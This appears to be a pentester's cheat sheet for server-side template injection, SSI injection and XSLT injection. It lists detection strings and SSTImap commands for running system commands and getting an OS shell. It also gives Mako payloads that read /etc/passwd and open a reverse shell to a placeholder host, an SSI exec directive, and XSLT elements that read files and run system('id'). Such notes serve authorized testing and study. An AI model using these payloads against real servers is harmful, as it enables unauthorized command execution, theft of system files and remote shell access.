SSTI

Resources

Detection

Insert this and check if there's an error

${{<%[%'"}}%\.

SSTImap

Setup

git clone https://github.com/vladko312/SSTImap.git; cd SSTImap; pip3 install -r requirements.txt

Usage

Detect

python3 sstimap.py -u http://<host>/index.php?fieldUsedInTemplate=xxx

Run system commands

python3 sstimap.py -u http://<host>/index.php?fieldUsedInTemplate=xxx -e Mako -S id

OS Shell

python3 sstimap.py -u http://<host>/index.php?fieldUsedInTemplate=xxx -e Mako --os-shell

Engine specific

Mako

${4+4}
<%import os;x=os.popen('cat /etc/passwd').read()%>${x}
<%from pathlib import Path;x=Path('/etc/passwd').read_text()%>${x}
<%import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",1236));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);%>

SSI Injection

Common file extensions

.shtml
.shtm
.stm    

Useful directives

<!--#exec cmd="whoami" -->
<!--#include virtual="some-source.js" -->

XSLT Injection

Detection

The < char since we are injecting XSL elements directly in XML.

Useful elements

<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />
<xsl:value-of select="php:function('system','id')" />

Resources​

Detection​

SSTImap​

Setup​

Usage​

Detect​

Run system commands​

OS Shell​

Engine specific​

Mako​

SSI Injection​

Common file extensions​

Useful directives​

XSLT Injection​

Detection​

Useful elements​

Resources

Detection

SSTImap

Setup

Usage

Detect

Run system commands

OS Shell

Engine specific

Mako

SSI Injection

Common file extensions

Useful directives

XSLT Injection

Detection

Useful elements